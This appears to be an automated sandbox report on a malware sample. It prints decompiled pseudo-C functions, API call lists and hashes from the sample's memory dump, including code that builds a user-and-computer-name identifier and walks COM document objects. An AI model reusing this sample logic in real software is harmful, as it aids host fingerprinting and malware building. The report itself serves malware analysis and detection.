StrChrA.SHLWAPI(00BA4D4E,0000005F,00000000,00000000,00000104), ref: 00BA67C4
memcpy.NTDLL(?,00BA4D4E,?), ref: 00BA67DD
lstrcpy.KERNEL32(?), ref: 00BA67F3

Part of subcall function 00BA978C: lstrlen.KERNEL32(?,00000000,00BAD330,00000001,00BA3435,00BAD00C,00BAD00C,00000000,00000005,00000000,00000000,?,?,?,00BA568F,00BA5073), ref: 00BA9795
Part of subcall function 00BA978C: mbstowcs.NTDLL ref: 00BA97BC
Part of subcall function 00BA978C: memset.NTDLL ref: 00BA97CE

Part of subcall function 00BA5931: lstrlenW.KERNEL32(00BA4D4E,?,?,00BA6967,3D00BAC0,80000002,00BA4D4E,00BA2227,74666F53,4D4C4B48,00BA2227,?,3D00BAC0,80000002,00BA4D4E,?), ref: 00BA5951

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

lstrcpy.KERNEL32(?,00000000), ref: 00BA6815

Strings

\, xrefs: 00BA67F9

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: afa3f7efb45e15dab039187a4d024022715a0bea17e9dd6b95383bbf72318454
Instruction ID: 52d2639bdd9abc7ad7b2de30b04bbc8b694bb8a219dd2796851c8a3974f0d8eb
Opcode Fuzzy Hash: afa3f7efb45e15dab039187a4d024022715a0bea17e9dd6b95383bbf72318454
Instruction Fuzzy Hash: 055179B250420AEFDF21AFA0DD41EAA3BF9EF4A310F148499FA1597021DB35D925EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BA26A0, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA26A0() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00BA8D59(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00BA677C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xba1e0d
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x00ba26ae
0x00ba26b1
0x00ba26b4
0x00ba26ba
0x00ba26bf
0x00ba26c5
0x00ba26cd
0x00ba26d0
0x00ba26d6
0x00ba26db
0x00ba26e8
0x00ba26f5
0x00ba26f9
0x00ba26fb
0x00ba26ff
0x00ba2702
0x00ba2712
0x00ba2765
0x00ba2766
0x00ba2714
0x00ba2719
0x00ba271a
0x00ba271f
0x00ba2722
0x00ba2735
0x00000000
0x00ba2737
0x00ba273a
0x00ba273f
0x00ba274d
0x00ba2750
0x00ba2756
0x00ba275b
0x00000000
0x00ba275d
0x00ba275d
0x00ba2760
0x00ba2760
0x00ba275b
0x00ba2735
0x00ba276b
0x00ba276c
0x00ba26db
0x00ba2772

APIs

GetUserNameW.ADVAPI32(00000000,00BA1E0B), ref: 00BA26B4
GetComputerNameW.KERNEL32(00000000,00BA1E0B), ref: 00BA26D0

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

GetUserNameW.ADVAPI32(00000000,00BA1E0B), ref: 00BA270A
GetComputerNameW.KERNEL32(00BA1E0B,?), ref: 00BA272D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00BA1E0B,00000000,00BA1E0D,00000000,00000000,?,?,00BA1E0B), ref: 00BA2750

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: aa89505e97b7caa362cf3c1fbc07827173e69b4e66090c1603c9b8540b581489
Instruction ID: 1f00b490cb79c5d95f763936557fb6307ed4f3befef1ce5321b0beb6904704f9
Opcode Fuzzy Hash: aa89505e97b7caa362cf3c1fbc07827173e69b4e66090c1603c9b8540b581489
Instruction Fuzzy Hash: 2421D676900208FFCB11DFE9DA85DAEBBF8EF49704B1044AAE502E7211EA309F44DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BA57EF, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BA57EF(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0xbad114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0xbad238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x00ba57f7
0x00ba57fa
0x00ba57fc
0x00ba5805
0x00ba5817
0x00ba5817
0x00ba581b
0x00ba581d
0x00ba5820
0x00ba5823
0x00ba582c
0x00ba5836
0x00ba583a
0x00ba583f
0x00ba5855
0x00ba5859
0x00ba58aa
0x00ba585b
0x00ba585b
0x00ba5863
0x00ba5872
0x00ba5877
0x00ba5887
0x00ba588d
0x00ba5898
0x00ba58a2
0x00ba58a6
0x00ba58a6
0x00ba5859
0x00ba58b1
0x00ba58b8

APIs

lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00BA5823
RtlAllocateHeap.NTDLL(00000000,?), ref: 00BA584F
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00BA5863
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00BA5872
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00BA588D

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: b902d208efbd04f15a5f194e54e5976b82755fda277a1570a71797129d63ca47
Instruction ID: 75419604ccf581e1a8ec6ecf4a81988fc76435893fb951aa7009caea0dc94742
Opcode Fuzzy Hash: b902d208efbd04f15a5f194e54e5976b82755fda277a1570a71797129d63ca47
Instruction Fuzzy Hash: 7621AE36904209AFDF218F68C845A9EBFB9EF86300F058195FC44AB315CB35DA14CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8CE0, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BA8CE0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00BA552D(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00BAA934(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xbad12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x00ba8ce0
0x00ba8ced
0x00ba8cef
0x00ba8d52
0x00000000
0x00ba8d52
0x00ba8d07
0x00ba8d0e
0x00ba8d1a
0x00ba8d1f
0x00ba8d21
0x00ba8d23
0x00ba8d25
0x00ba8d27
0x00ba8d29
0x00ba8d35
0x00ba8d45
0x00000000
0x00ba8d37
0x00ba8d37
0x00ba8d3e
0x00ba8d4b
0x00ba8d4b
0x00ba8d4b
0x00ba8d3e
0x00ba8d35
0x00ba8d50
0x00000000
0x00000000
0x00ba8d56

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,00BA3331,?,?,00000000,00000000), ref: 00BA8D1A
ResetEvent.KERNEL32(?), ref: 00BA8D1F
GetLastError.KERNEL32 ref: 00BA8D37
GetLastError.KERNEL32(?,?,00000102,00BA3331,?,?,00000000,00000000), ref: 00BA8D52

Part of subcall function 00BA552D: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,00BA8CFF,?,?,?,?,00000102,00BA3331,?,?,00000000), ref: 00BA5539
Part of subcall function 00BA552D: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00BA8CFF,?,?,?,?,00000102,00BA3331,?), ref: 00BA5597
Part of subcall function 00BA552D: lstrcpy.KERNEL32(00000000,00000000), ref: 00BA55A7

SetEvent.KERNEL32(?), ref: 00BA8D45

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 7823006647d29fe70d22d6aa227742fbdf0e57b7d1229f0453cc3b417313ac9b
Instruction ID: 4a65ddd5b13ab689d036d3f8a5ce29c43c4c0967f2d78a57a01ce94a79881192
Opcode Fuzzy Hash: 7823006647d29fe70d22d6aa227742fbdf0e57b7d1229f0453cc3b417313ac9b
Instruction Fuzzy Hash: AB016931108201ABDA306B61DC45F5BBAE9FFA6364F214A7DF596D28F0DF21E805DA21

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9864, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA9864(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xbad26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xbad25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xbad258 = _t6;
					 *0xbad264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xbad254 = _t7;
					if(_t7 == 0) {
						 *0xbad254 =  *0xbad254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x00ba986c
0x00ba9872
0x00ba9879
0x00000000
0x00ba98d3
0x00ba987b
0x00ba9883
0x00ba9890
0x00ba9890
0x00ba98d0
0x00000000
0x00ba98d0
0x00ba9892
0x00ba9892
0x00ba9897
0x00ba98a9
0x00ba98ae
0x00ba98b4
0x00ba98ba
0x00ba98c1
0x00ba98c3
0x00ba98c3
0x00000000
0x00ba98ca
0x00ba988c
0x00000000
0x00000000
0x00ba988e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00BA103A,?,?,00000001,?,?,?,00BA91B4,?), ref: 00BA986C
GetVersion.KERNEL32(?,00000001,?,?,?,00BA91B4,?), ref: 00BA987B
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00BA91B4,?), ref: 00BA9897
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00BA91B4,?), ref: 00BA98B4
GetLastError.KERNEL32(?,00000001,?,?,?,00BA91B4,?), ref: 00BA98D3

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 800098ea9c369486d95fd9c37836de0a99c435e39880b587c473417b962fff76
Instruction ID: 7a2c7186a1fb2975cd98f179c8f88bc71d4e017e8fb92e992964030097b9608b
Opcode Fuzzy Hash: 800098ea9c369486d95fd9c37836de0a99c435e39880b587c473417b962fff76
Instruction Fuzzy Hash: A3F03770689302EBD7209B64AD1AB193FA1E787B91F10455AE543C71E0EF78C841EB25

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2CC3, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00BA2CC3(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xbad2a4; // 0x44fa5a8
					_t5 = _t103 + 0xbae038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xbac2a8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xbad2a4; // 0x44fa5a8
												_t28 = _t109 + 0xbae0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xbad2a4; // 0x44fa5a8
														_t33 = _t79 + 0xbae078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x00ba2cc8
0x00ba2cd1
0x00ba2cd2
0x00ba2cd6
0x00ba2cdc
0x00ba2ce2
0x00ba2ceb
0x00ba2cf1
0x00ba2cfb
0x00ba2cfd
0x00ba2d03
0x00ba2d08
0x00ba2d13
0x00ba2d19
0x00ba2d1e
0x00ba2e40
0x00ba2d24
0x00ba2d24
0x00ba2d31
0x00ba2d37
0x00ba2d3d
0x00ba2d41
0x00ba2d47
0x00ba2d54
0x00ba2d58
0x00ba2d5e
0x00ba2d61
0x00ba2d69
0x00ba2d6a
0x00ba2d6e
0x00ba2d72
0x00ba2d75
0x00ba2d78
0x00ba2d7e
0x00ba2d87
0x00ba2d8d
0x00ba2d8e
0x00ba2d91
0x00ba2d92
0x00ba2d93
0x00ba2d9b
0x00ba2d9c
0x00ba2d9d
0x00ba2d9f
0x00ba2da3
0x00ba2da7
0x00000000
0x00000000
0x00ba2dad
0x00ba2db6
0x00ba2dbc
0x00ba2dc6
0x00ba2dca
0x00ba2dcc
0x00ba2dd9
0x00ba2ddd
0x00ba2de5
0x00ba2dea
0x00ba2dfc
0x00ba2dfe
0x00ba2e04
0x00ba2e04
0x00ba2e0d
0x00ba2e0d
0x00ba2e0f
0x00ba2e15
0x00ba2e15
0x00ba2e18
0x00ba2e1e
0x00ba2e21
0x00ba2e2a
0x00000000
0x00000000
0x00000000
0x00ba2e2a
0x00ba2d7e
0x00ba2d78
0x00ba2d61
0x00ba2e30
0x00ba2e30
0x00ba2e36
0x00ba2e36
0x00ba2e3c
0x00ba2e3c
0x00ba2e45
0x00ba2e4b
0x00ba2e4b
0x00ba2d08
0x00ba2e54

APIs

SysAllocString.OLEAUT32(00BAC2A8), ref: 00BA2D13
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00BA2DF4
SysFreeString.OLEAUT32(00000000), ref: 00BA2E0D
SysFreeString.OLEAUT32(?), ref: 00BA2E3C

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 1a4163df1beae382bfc8ceeff3656230f59644f80487542ad629a78076f2a560
Instruction ID: 60d38d6a3848f774e2b7f462f134e912b19f2242d8e392ec08044b3b2e309d64
Opcode Fuzzy Hash: 1a4163df1beae382bfc8ceeff3656230f59644f80487542ad629a78076f2a560
Instruction Fuzzy Hash: EA514E75D00519EFCB14DFE8C8889AEB7BAEF8A701B144594E915EB224DB319D42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1721, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00BA1721(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00BA551C(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00BA11C2(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00BA6042(_t101,  &_v236, _a8, _t96 - _t81);
					E00BA6042(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00BA11C2(_t101,  &E00BAD1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00BA11C2(_a16, _a4);
						E00BA18BC(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00BAB048();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00BAB042();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00BA5F2D(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00BA901A(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00BA923D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00BAD1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00ba1724
0x00ba1730
0x00ba1736
0x00ba173b
0x00ba173f
0x00ba189c
0x00ba18a0
0x00ba18a0
0x00ba1745
0x00ba1749
0x00ba174d
0x00ba1750
0x00ba175b
0x00ba1761
0x00ba1766
0x00ba1769
0x00ba1783
0x00ba178f
0x00ba1798
0x00ba17a2
0x00ba17a7
0x00ba17a9
0x00ba17ac
0x00ba185a
0x00ba1860
0x00ba1871
0x00ba1884
0x00ba1894
0x00000000
0x00ba1899
0x00ba17b5
0x00ba17bc
0x00ba17c0
0x00ba17c6
0x00ba17c8
0x00ba17ca
0x00ba17cc
0x00ba17ce
0x00ba17d8
0x00ba17dd
0x00ba17df
0x00ba17e1
0x00ba17e2
0x00ba17e3
0x00ba17e4
0x00ba17eb
0x00ba17f2
0x00ba17f5
0x00ba17f5
0x00ba17c2
0x00ba17c2
0x00ba17c2
0x00ba17fd
0x00ba1805
0x00ba180e
0x00ba1813
0x00ba1813
0x00ba1818
0x00000000
0x00000000
0x00ba181a
0x00ba181d
0x00ba1827
0x00000000
0x00000000
0x00ba1829
0x00ba1829
0x00ba1833
0x00ba1813
0x00ba1818
0x00000000
0x00000000
0x00000000
0x00ba1818
0x00ba183d
0x00ba1840
0x00ba1843
0x00ba184a
0x00ba184a
0x00ba1857
0x00000000
0x00ba1857
0x00ba1752
0x00ba1756
0x00ba1757
0x00ba1759
0x00000000
0x00000000
0x00000000
0x00ba1759
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00BA17CE
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00BA17E4
memset.NTDLL ref: 00BA1884
memset.NTDLL ref: 00BA1894

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 0e2fc71a96bd2d47989a2ac917d7c9601e98f50bc6643af65f56cf8a37640c29
Instruction ID: b545e9cb6f5adcc488397621a5ad54af401080fe7d88bd82e8e72c4fc77cdf5e
Opcode Fuzzy Hash: 0e2fc71a96bd2d47989a2ac917d7c9601e98f50bc6643af65f56cf8a37640c29
Instruction Fuzzy Hash: 1641A271A04219ABDB10DFACCC81BEE77F9EF46710F1089A9F916A7181DB749D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA934, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,73B74D40), ref: 00BAA946

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

ResetEvent.KERNEL32(?), ref: 00BAA9BA
GetLastError.KERNEL32 ref: 00BAA9DD
GetLastError.KERNEL32 ref: 00BAAA88

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 1c2635e32e00bb021ee1ef4371d4287f2ae9f46369b19aa6ca718dc2b449045c
Instruction ID: 472d1939cd8308901cb4461cf7ef508c6f7ee0be2d3ee00222871e1e01ce942c
Opcode Fuzzy Hash: 1c2635e32e00bb021ee1ef4371d4287f2ae9f46369b19aa6ca718dc2b449045c
Instruction Fuzzy Hash: 08415EB1500204BFD7319FA1DD49EABBBFDEB8A740F104969F542E24A0DB319945DB31

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2303, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

